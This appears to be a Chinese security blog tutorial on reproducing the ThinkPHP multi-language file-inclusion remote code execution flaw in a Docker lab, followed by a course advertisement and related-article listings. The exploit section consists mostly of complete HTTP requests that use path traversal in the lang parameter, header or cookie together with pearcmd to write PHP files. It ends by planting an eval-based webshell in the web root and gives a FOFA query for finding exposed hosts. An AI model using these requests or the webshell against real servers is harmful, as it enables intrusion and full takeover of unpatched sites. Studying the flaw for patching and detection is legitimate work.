ThinkPHP多语言模块文件包含RCE复现详细教程

最新推荐文章于 2025-09-03 12:35:37 发布
原创 最新推荐文章于 2025-09-03 12:35:37 发布 · 2.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #开发语言

本文详述了ThinkPHP在开启多语言功能时存在的文件包含漏洞,涉及版本包括6.0.1至6.0.13、5.0.0至5.0.12和5.1.0至5.1.8。通过GET、HEADER、COOKIE等方式,结合pearcmd文件包含,可以实现RCE。文章提供了漏洞复现步骤,包括环境搭建、漏洞利用和获取shell的方法。
免责声明
本文章只用于技术交流,若使用本文章提供的技术信息进行非法操作,后果均由使用者本人负责。

漏洞描述:

ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,实现目录穿越+文件包含,通过pearcmd文件包含这个trick即可实现RCE。

影响版本:

6.0.1 < ThinkPHP≤ 6.0.13

5.0.0 < ThinkPHP≤ 5.0.12

5.1.0 < ThinkPHP≤ 5.1.8

利用条件:

1、需要Thinkphp开启多语言功能

2、安装pear扩展

3、知道pearcmd.php路径

4、register_argc_argv=on

FOFA搜索语法:

header=“think_lang”

环境搭建:

服务器首先要有docker环境,没有的可以先部署一个

1、docker直接拉取vulfocus 的thinkphp:6.0.12的漏洞环境镜像:
docker pull vulfocus/thinkphp:6.0.12
2、启动容器,将容器的80端口映射到本机的80端口
docker run  --nametp123 -p80:80 -d镜像id

浏览器访问:ip+/public/index.php 如下图则搭建成功:

漏洞复现:

pearcmd.php这个文件的一些具体细节可以参考这篇文章

<https://www.leavesongs.com/PENETRATION/docker-php-include-
getshell.html#0x06-pearcmdphp>

进入容器查看pearcmd.php路径,执行 ````

find / -name pearcmd.php 2>/dev/null

``

/usr/local/lib/php/pearcmd.php

EXP:

在/tmp/下生成hello.php
GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
think-lang:../../../../../../../../usr/local/lib/php/pearcmd  
Cookie: think_lang=zh-cn  
Connection: close
进入容器查看/tmp/hellp.php

包含hello.php
GET /public/index.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
think-lang:../../../../../../../../tmp/hello  
Cookie: think_lang=zh-cn  
Connection: close
repeater发包:

看看浏览器页面成功执行phpinfo:

GET:

直接利用p牛文章中的请求包,需要根据实际情况改变文件名称,写不进去可以考虑多加点…/

创建文件
GET /public/index.php?lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/1.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater发包:

进入容器查看:

文件包含/tmp/1.php
GET /public/index.php?lang=../../../../../../../../../../../../tmp/1 HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater发包:

再看看浏览器页面,成功执行phpinfo:

HEADER:

创建文件
GET /public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/2.php HTTP/1.1  
Host: 192.168.36.128  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
think-lang:../../../../../../../../../../../../../../usr/local/lib/php/pearcmd  
Cookie: think_lang=zh-cn  
Connection: close
repeater发包:

进入容器查看:

文件包含/tmp/2.php
GET /public/index.php?lang=../../../../../../../../../../../../tmp/2 HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater发包:

在看看浏览器页面成功执行phpinfo:

COOKIES:

创建文件
GET /public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/3.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd  
Connection: close
repeater发包:

进入容器查看:

文件包含/tmp/3.php
GET /public/index.php?lang=../../../../../../../../../../../../tmp/3 HTTP/1.1  
Host: 192.168.36.128  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Sec-Purpose: prefetch;prerender  
Purpose: prefetch  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater发包:

在看看浏览器页面成功执行phpinfo:

GETSHELL

于是我梅开二度决定写入一个马子试试:

这次我们直接写到网站根目录(注:phpinfo可以查看网站绝对路径)

写入文件
GET /public/index.php?lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater发包:

浏览器访问:

蚁剑成功连接:

最后

分享一个快速学习【网络安全】的方法,「也许是」最全面的学习方法:
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

在这里插入图片描述

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k。

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料包免费领取!
扫下方二维码,免费领取

有了这些基础,如果你要深入学习,可以参考下方这个超详细学习路线图,按照这个路线学习,完全够支撑你成为一名优秀的中高级网络安全工程师:

高清学习路线图或XMIND文件(点击下载原文件)

还有一些学习中收集的视频、文档资源,有需要的可以自取:
每个成长路线对应板块的配套视频:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,需要的可以【扫下方二维码免费领取】

白帽Allen
关注
ThinkPHP 多语言模块RCE漏洞复现
0xSec
12-25 3996
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
【vulhub】thinkphp漏洞系列
最新发布
2401_86835152的博客
09-03 663
通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含,从而利用 pearcmd 文件包含实现远程命令执行通过构造特定的 URL,可以实现目录穿越和文件包含,然后利用 pearcmd 文件包含实现远程命令执行。具体来说,该框架在使用preg_replace的/e模式匹配路由时,未对用户输入参数进行充分过滤,导致输入参数被直接插入双引号中执行,从而引发任意代码执行漏洞。模式进行正则匹配,用户输入的参数可能被直接注入到代码执行上下文中,导致攻击者可构造恶意输入执行任意代码。
ThinkPHP多语言文件包含RCE(QVD-2022-46174)
weixin_43610673的博客
01-10 2686
ThinkPHP6新版本补丁\think\middleware\LoadLangPack::detect`中增加了对url、Header、Cookie中设置语言的合法性检查。查看官方文档关于多语言的解释可见:会首先检查请求的URL或者Cookie中是否包含语言变量。在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。需开启多语言选项,以thinkPHP6版本为例。方法会被自动加载(中间件的入口执行方法)在detect方法中设置语言之后进入。进行语言切换,路径直接拼接而成。
Thinkphp5~6多语言文件包含rce漏洞复现and详细分析解析
君逍遥o
09-08 2431
Thinkphp5~6多语言文件包含rce漏洞复现and详细分析解析
Thinkphp QVD-2022-46174 多语言rce
qq_61768489的博客
01-18 2293
如果 Thinkphp 程序开启了多语言功能,那就可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCEPHP环境开启了PHP环境安装了pcel/pearDocker默认的PHP环境恰好满足上述条件。所以先使用vulhub进行漏洞利用的复现
[漏洞复现]Thinkphp RCE
qq_45751902的博客
12-10 2401
Thinkphp 是一款 PHP 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含,从而利用 pearcmd 文件包含实现远程命令执行(RCE)。1、需要Thinkphp开启多语言功能2、需要有pearcmd扩展。
ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现
weixin_45653478的博客
04-27 1065
ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当ThinkPHP开启了多语言功能时,攻击者可以通过lang参数和目录穿越实现文件包含,当存在其他扩展模块如 pear 扩展时,攻击者可进一步利用文件包含实现远程代码执行。影响版本。
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
热门推荐
weixin_43263451的博客
03-30 1万+
大概思路就是我们可以修改requests类的filter属性、method属性以及get属性的值,从而在调用param方法时,call_user_func_array的值我们就可以控制,造成了远程代码执行漏洞。 0. 大致流程 经过入口文件进入run函数 首先在116行根据url获取调度信息时,触发变量覆盖漏洞从而修改requests对象的属性值,然后获取?s=captcha的调度信息并返回给$dispatch 再到139行进入exec函数并将$dispatch作为参数带入 跟进后根据$dispatch
漏洞深度分析|Thinkphp 多语言 RCE
LJQClqjc的博客
12-12 1098
棱镜七彩漏洞深度分析
thinkphp5 RCE漏洞复现
feng的博客
03-03 3980
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
Thinkphp历史RCE总结与复现,从零基础到精通,收藏这篇就够了!
Javachichi的博客
03-11 1080
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。**添加星标不迷路**
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 1586
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE
shelter1234567的博客
01-22 1550
本次我们继续以漏洞挖掘者的视角,来分析thinkphpRCE
ThinkPHP5代码审计【RCE
D.MIND 的博客
05-14 1464
composer create-project --prefer-dist topthink/think=5.0.23 thinkphp_5.0.23
ThinkPHP2--RCE漏洞复现
m0_74402888的博客
05-03 1367
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
THINKPHP5 多模块文件自动生成和绑定模板
weixin_42362496的博客
08-11 1000
thinkphp5如何生成多个模块thinkphp5如何生成多入口文件? 我们在开发中,可能会涉及到前台和后台两个模块。但thinkphp下载后只有一个index模块。 我们现在新建一个admin的模块 第一步:在跟目录创建一个admin.php文件,代码如下 define('APP_PATH', __DIR__ . '/application/'); // 加载框架引导文件 require __DIR__ . '/thinkphp/start.php'; $build = include './buil
thinkphp5-rce
shierbai的博客
05-17 631
method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站。
ThinkPHP6.0.12反序列化RCE挖掘
include_voidmain的博客
07-05 2117
ThinkPHP6.0.12反序列化RCE挖掘
以上问题依然没有解决,已经修改php.ini ,设置open_basedir = /home/wwwroot/farmadmin/public/:/tmp/:/proc/,并且给 /home/wwwroot/farmadmin/public 目录设置了权限 chmod 777 public,但是依然提示错误: Warning: require(): open_basedir restriction in effect. File(/home/wwwroot/farmadmin/thinkphp/base.php) is not within the allowed path(s): (/home/wwwroot/farmadmin/public/:/tmp/:/proc/) in /home/wwwroot/farmadmin/public/index.php on line 34 Warning: require(/home/wwwroot/farmadmin/thinkphp/base.php): failed to open stream: Operation not permitted in /home/wwwroot/farmadmin/public/index.php on line 34 Fatal error: require(): Failed opening required '/home/wwwroot/farmadmin/public/../thinkphp/base.php' (include_path='.:/usr/local/php/lib/php') in /home/wwwroot/farmadmin/public/index.php on line 34
07-20
很抱歉您仍然遇到问题。根据您提供的错误信息,问题可能是因为 `open_basedir` 配置未生效或者存在其他权限问题。 请尝试以下步骤来解决问题: 1. 确认您正在编辑的 `php.ini` 文件是正确的文件。您可以通过在命令行中运行 `php --ini` 来查找当前正在使用的配置文件路径。 2. 确保您修改的是正确的 `php.ini` 文件,并且修改后的配置项生效。您可以通过在 PHP 代码中使用 `phpinfo()` 函数来验证 `open_basedir` 配置是否已更改。创建一个包含以下内容的 PHP 文件,并在浏览器中访问该文件: ```php <?php phpinfo(); ?> ``` 在打开的页面中搜索 `open_basedir`,确认它是否显示为您修改后的值。 3. 检查权限问题。确保 `/home/wwwroot/farmadmin/thinkphp/base.php` 文件及其所在目录的权限设置正确。除了 `public` 目录,还需要确保 `thinkphp` 目录和其内部文件的访问权限正确。您可以尝试将 `/home/wwwroot/farmadmin/thinkphp/base.php` 文件的权限设置为 777,以及其所在目录的权限设置为 755: ``` sudo chmod 777 /home/wwwroot/farmadmin/thinkphp/base.php sudo chmod 755 /home/wwwroot/farmadmin/thinkphp ``` 4. 重新启动 Nginx 和 PHP-FPM 服务: ``` sudo systemctl restart nginx sudo systemctl restart php-fpm ``` 请注意,为了安全起见,将文件和目录权限设置为 777 不是一个好的实践。一旦问题解决,请尽快将权限设置为更加安全的值。 如果问题仍然存在,请检查其他可能的配置文件(例如 `php-fpm.conf`)中是否存在其他限制或配置可能导致此错误。 希望这些步骤能帮助您解决问题。如果您有任何其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值